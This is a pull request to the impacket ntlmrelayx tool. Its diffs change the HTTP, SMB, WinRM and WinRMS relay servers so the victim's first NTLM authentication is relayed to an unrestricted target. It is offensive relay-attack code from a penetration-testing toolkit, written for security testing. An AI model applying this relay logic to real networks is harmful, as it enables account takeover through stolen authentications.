### PR TITLE
Relay initial multirelay authentication to unrestricted targets

### DIFF
--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -213,13 +213,7 @@ class HTTPRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or log-in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                # We can start the relay process
-                self.do_relay(messageType, token, proxy, content)
+            self.do_multirelay(messageType, token, proxy, content)
 
         def do_AUTHHEAD(self, message = b'', proxy=False):
             if proxy:
@@ -298,15 +292,28 @@ class HTTPRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or log-in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                # We can start the relay process
-                self.do_relay(messageType, token, proxy)
+            self.do_multirelay(messageType, token, proxy)
 
             return
+
+        def do_multirelay(self, messageType, token, proxy, content=None):
+            if self.server.config.disableMulti or self.relayToHost:
+                return self.do_relay(messageType, token, proxy, content)
+
+            # The username is not available until the AUTHENTICATE_MESSAGE. If an
+            # unrestricted target exists, use its challenge for the first
+            # authentication instead of spending that authentication locally.
+            if messageType == 1:
+                self.target = self.server.config.target.getTarget()
+                if self.target is not None:
+                    LOG.info("(HTTP): Received connection from %s, attacking target %s://%s before identity discovery" %
+                             (self.client_address[0], self.target.scheme, self.target.netloc))
+                    self.relayToHost = True
+                    return self.do_relay(messageType, token, proxy, content)
+
+            # No unrestricted target is available. Authenticate locally so the
+            # identity can be used to select a username-bound target.
+            return self.do_local_auth(messageType, token, proxy)
 
         def do_ntlm_negotiate(self, token, proxy):
             if self.target.scheme.upper() in self.server.config.protocolClients:
@@ -454,9 +461,9 @@ class HTTPRelayServer(Thread):
             elif messageType == 3:
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
+                self.authUser = authenticateMessage.getUserString()
 
                 if self.server.config.disableMulti:
-                    self.authUser = authenticateMessage.getUserString()
                     target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
 
                 if not self.do_ntlm_auth(token, authenticateMessage):

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -143,6 +143,7 @@ class SMBRelayServer(Thread):
         respPacket['Command'] = smb3.SMB2_NEGOTIATE
         respPacket['SessionID'] = 0
 
+        relayInitialAuthentication = self.config.disableMulti
         if self.config.disableMulti:
             if self.config.mode.upper() == 'REFLECTION':
                 self.targetprocessor = TargetsProcessor(singleTarget='SMB://%s:445/' % connData['ClientIP'])
@@ -159,7 +160,17 @@ class SMBRelayServer(Thread):
                     return None, [respPacket], STATUS_BAD_NETWORK_NAME
 
             LOG.info("(SMB): Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc))
+        else:
+            # Prefer relaying the first authentication to an unrestricted target.
+            # If only username-bound targets remain, SessionSetup falls back to
+            # local authentication so TreeConnect can select by identity.
+            self.target = self.targetprocessor.getTarget()
+            if self.target is not None:
+                relayInitialAuthentication = True
+                LOG.info("(SMB): Received connection from %s, attacking target %s://%s before identity discovery" %
+                         (connData['ClientIP'], self.target.scheme, self.target.netloc))
 
+        if relayInitialAuthentication:
             try:
                 if self.config.mode.upper() == 'REFLECTION':
                     # Force standard security when doing reflection
@@ -176,6 +187,8 @@ class SMBRelayServer(Thread):
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
+                if not self.config.disableMulti:
+                    connData['relayToHost'] = True
                 smbServer.setConnectionData(connId, connData)
 
         if isSMB1 is False:
@@ -507,6 +520,7 @@ class SMBRelayServer(Thread):
     def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
         connData = smbServer.getConnectionData(connId, checkStatus = False)
 
+        relayInitialAuthentication = self.config.disableMulti
         if self.config.disableMulti:
             if self.config.mode.upper() == 'REFLECTION':
                 self.targetprocessor = TargetsProcessor(singleTarget='SMB://%s:445/' % connData['ClientIP'])
@@ -521,7 +535,17 @@ class SMBRelayServer(Thread):
                     return [smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME
 
             LOG.info("(SMB): Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc))
+        else:
+            # Prefer relaying the first authentication to an unrestricted target.
+            # If only username-bound targets remain, SessionSetup falls back to
+            # local authentication so TreeConnect can select by identity.
+            self.target = self.targetprocessor.getTarget()
+            if self.target is not None:
+                relayInitialAuthentication = True
+                LOG.info("(SMB): Received connection from %s, attacking target %s://%s before identity discovery" %
+                         (connData['ClientIP'], self.target.scheme, self.target.netloc))
 
+        if relayInitialAuthentication:
             try:
                 if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
                     extSec = False
@@ -542,6 +566,8 @@ class SMBRelayServer(Thread):
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
+                if not self.config.disableMulti:
+                    connData['relayToHost'] = True
                 smbServer.setConnectionData(connId, connData)
 
         else:
@@ -957,4 +983,3 @@ class SMBRelayServer(Thread):
     def run(self):
         LOG.info("Setting up SMB Server on port %s" % self.server.server_address[1])
         self._start()
-

--- a/impacket/examples/ntlmrelayx/servers/winrmrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/winrmrelayserver.py
@@ -196,13 +196,7 @@ class WinRMRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or -in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                # We can start the relay process
-                self.do_relay(messageType, token, proxy, content)
+            self.do_multirelay(messageType, token, proxy, content)
 
         def do_AUTHHEAD(self, message = b'', proxy=False):
             if proxy:
@@ -281,14 +275,23 @@ class WinRMRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or log-in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                self.do_relay(messageType, token, proxy)
+            self.do_multirelay(messageType, token, proxy)
 
             return
+
+        def do_multirelay(self, messageType, token, proxy, content=None):
+            if self.server.config.disableMulti or self.relayToHost:
+                return self.do_relay(messageType, token, proxy, content)
+
+            if messageType == 1:
+                self.target = self.server.config.target.getTarget()
+                if self.target is not None:
+                    LOG.info("(WinRM): Received connection from %s, attacking target %s://%s before identity discovery" %
+                             (self.client_address[0], self.target.scheme, self.target.netloc))
+                    self.relayToHost = True
+                    return self.do_relay(messageType, token, proxy, content)
+
+            return self.do_local_auth(messageType, token, proxy)
 
         def do_ntlm_negotiate(self, token, proxy):
             if self.target.scheme.upper() in self.server.config.protocolClients:
@@ -429,14 +432,14 @@ class WinRMRelayServer(Thread):
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
 
-                if self.server.config.disableMulti:
-                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
-                                                    authenticateMessage['user_name'].decode('utf-16le'))).upper()
-                    else:
-                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
-                                                    authenticateMessage['user_name'].decode('ascii'))).upper()
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
 
+                if self.server.config.disableMulti:
                     target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
 
                 if not self.do_ntlm_auth(token, authenticateMessage):

--- a/impacket/examples/ntlmrelayx/servers/winrmsrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/winrmsrelayserver.py
@@ -224,13 +224,7 @@ class WinRMSRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or -in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                # We can start the relay process
-                self.do_relay(messageType, token, proxy, content)
+            self.do_multirelay(messageType, token, proxy, content)
 
         def do_AUTHHEAD(self, message = b'', proxy=False):
             if proxy:
@@ -298,14 +292,23 @@ class WinRMSRelayServer(Thread):
 
             token, messageType = self.strip_blob(proxy)
 
-            # Should we relay or log-in locally?
-            if self.relayToHost is False and not self.server.config.disableMulti:
-                self.do_local_auth(messageType, token, proxy)
-                return
-            else:
-                self.do_relay(messageType, token, proxy)
+            self.do_multirelay(messageType, token, proxy)
 
             return
+
+        def do_multirelay(self, messageType, token, proxy, content=None):
+            if self.server.config.disableMulti or self.relayToHost:
+                return self.do_relay(messageType, token, proxy, content)
+
+            if messageType == 1:
+                self.target = self.server.config.target.getTarget()
+                if self.target is not None:
+                    LOG.info("(WinRMS): Received connection from %s, attacking target %s://%s before identity discovery" %
+                             (self.client_address[0], self.target.scheme, self.target.netloc))
+                    self.relayToHost = True
+                    return self.do_relay(messageType, token, proxy, content)
+
+            return self.do_local_auth(messageType, token, proxy)
 
         def do_ntlm_negotiate(self, token, proxy):
             if self.target.scheme.upper() in self.server.config.protocolClients:
@@ -443,13 +446,14 @@ class WinRMSRelayServer(Thread):
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
 
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
+
                 if self.server.config.disableMulti:
-                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
-                                                    authenticateMessage['user_name'].decode('utf-16le'))).upper()
-                    else:
-                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
-                                                    authenticateMessage['user_name'].decode('ascii'))).upper()
                     target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
 
                 if not self.do_ntlm_auth(token, authenticateMessage):


### PR DESCRIPTION
Improve ntlmrelayx multirelay handling so the initial NTLM authentication is relayed when an unrestricted target is available.

Previously, multirelay always completed the first authentication locally to discover the username. Because the NTLM response was bound to the locally generated challenge, that authentication could not subsequently be relayed.

This change:

- Selects an unrestricted target before identity discovery.
- Uses that target's challenge for the initial authentication.
- Completes the initial relay and obtains the username from the Type 3 message.
- Continues through the existing forced-reauthentication workflow using identity-aware target selection.
- Falls back to local authentication when only username-bound targets are available.
- Applies the behavior to SMB1, SMB2, HTTP, WinRM, and WinRMS listeners.